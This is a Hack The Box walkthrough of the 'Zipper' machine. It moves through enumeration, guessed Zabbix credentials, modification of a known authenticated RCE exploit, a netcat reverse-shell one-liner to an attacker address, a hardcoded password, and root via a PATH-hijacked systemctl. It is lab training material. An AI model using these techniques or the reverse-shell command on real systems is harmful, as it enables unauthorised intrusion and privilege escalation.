# Hack The Box - Zipper

## Quick Summary

Hey guys today Zipper retired and here’s my write-up. Owning user on this box was challenging because we have to exploit an RCE vulnerability which is not really easy and then we have to get a stable shell to be able to enumerate, for the privilege escalation it was easy but I also liked it because it was a binary exploitation. It was a very fun box and I liked it. It’s a linux box and its ip is 10.10.10.108 , I added it to /etc/hosts as zipper.htb. Let’s jump right in.

## Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC zipper.htb

We only get 2 ports , http on port 80 and ssh on port 22. so we are going to check http

## HTTP enumeration

By visiting zipper.htb we get the default apache2 page :

So I’m going to run gobuster with directory-list-2.3-medium.txt to see if there are any sub directories :
gobuster -u http://zipper.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Output :

We got /zabbix , let’s look at that in the browser :

We get this login page , we don’t have credentials but down there there’s an option to sign in as a guest , but before we do that let’s get an idea about zabbix

Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption. -Wikipedia

So basically it’s a server monitoring tool , let’s login as a guest and see what we can get

We get this dashboard , but we are not privileged to do anything because we are guest
After some enumeration we will notice in : Monitoring –> Latest data , Zapper's Backup Script

Now we have a potential username : zapper , we can try to brute force or fuzz the password , but a quick guess worked for me , the username is the password zapper : zapper

GUI access disabled , on exploit-db there’s an authenticated remote code execution exploit for an old version of zabbix , check it here , Unfortunately valid credentials are not enough to exploit it , if we take a look here :

We also need hostid , and to get that we need to get GUI access

There’s a cli tool for zabbix on github , we can use it to gain GUI access. Installation and configuration is simple you will get the source from github then install it with install.py install then you will create a conf file for it by executing zabbix-cli --config, it will be saved in $HOME/.zabbix-cli/zabbix-cli.conf , open the conf file and in Zabbix API section add this line : For details read the documentation here Then we will run zabbix-cli it will ask for a username and a password , we already have them zapper : zapper if we executed show_usergroups we will see that zapper is in a group called No access to the fronted and GUI access to that group is disabled We will create a new group and call it guiaccess and leave GUI access as system default create_usergroup Then we will add zapper to that group and delete him from No access to the fronted add_user_to_usergroup remove_user_from_usergroup Now if we try to login again as zapper we will get the dashboard : ## RCE and getting user From Configuration –> Hosts we have 2 hosts and the second one is the availabe one : If we click on it we will get an edit page , but we will notice that the host id is included in the url as a GET parameter : Now we can edit the python exploit and add the host id : 10106 , this is how the basic login info in the script will look like : And we get a decent shell , but this shell executes commands through API requests which is not efficient , so we will get a reverse shell like this : rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f I got this shell from payload all the things Problem is , we will find that we are in a docker container , and that’s actually a bad rabbit hole and when I was doing this box for the first time i spent a lot of time trying to escape this docker container , And eventually i found out that this is the wrong server. If we take a look at this page from zabbix documentation , this part : there’s an option called execute_on , which has 2 possible values : 0 to execute on zabbix agent , and 1 to execute on zabbix server. We don’t have that option included in the exploit so we are using the default option 1 which means we are executing commands on zabbix server. So we will edit the exploit json data and add "execute_on" : "0" in those 2 parts : After that we will run the exploit again and now it will run on the right server , however the shell that we used before didn’t work and died immediately because the exploit crashed for some reason , I had to comment out the last line which prints the result : print cmd_exe["result"]["value"] , but it didn’t fix it , so I tried some other shells and the perl one worked : Then I used used python3 pty to get a proper shell , python2 didn’t exist on the server ## Final exploit after edits : First thing we will notice that we are zabbix and in /home there’s a directory for the user zapper We can’t read user.txt and we can’t go into .ssh There’s another directory called utils which contains 2 files , backup.sh and zabbix-service cat backup.sh We see that it has a hardcoded password in it : ZippityDoDah , we can try to su to zapper with that password And it worked , now we can get the ssh key from .ssh and have ssh connection And we owned user ! ## Privilege Escalation and getting root If we take a look at the utils directory again and execute zabbix-service : It asks us start or stop? then it executes something and exits , we will check if that binary is a suid binary : find /home/zapper/utils -perm -4000 It’s a suid binary , we need to know what is it doing. Without reverse engineering , strings was enough : strings zabbix-service This command is being executed when we type start : systemctl daemon-reload && systemctl start zabbix-agent , so what are we going to do is the same as we did in Dab , the only difference is in dab we hijacked a shared library that the binary used , but here we will hijack a binary. By default systemctl points to /bin/systemctl We will create a c program to execute /bin/bash : Then we will compile it with gcc : gcc exploit.c -o systemctl Now we have our fake binary ready : We will add /home/zapper/utils as the first entry in PATH env variable , so the system will look there first : export PATH=/home/zapper/utils:$PATH
This is changing the PATH variable to /home/zapper/utils: + the old path

Now systemctl points to our fake binary , let’s run zabbix-service :

And we owned root !

That’s it , Feedback is appreciated !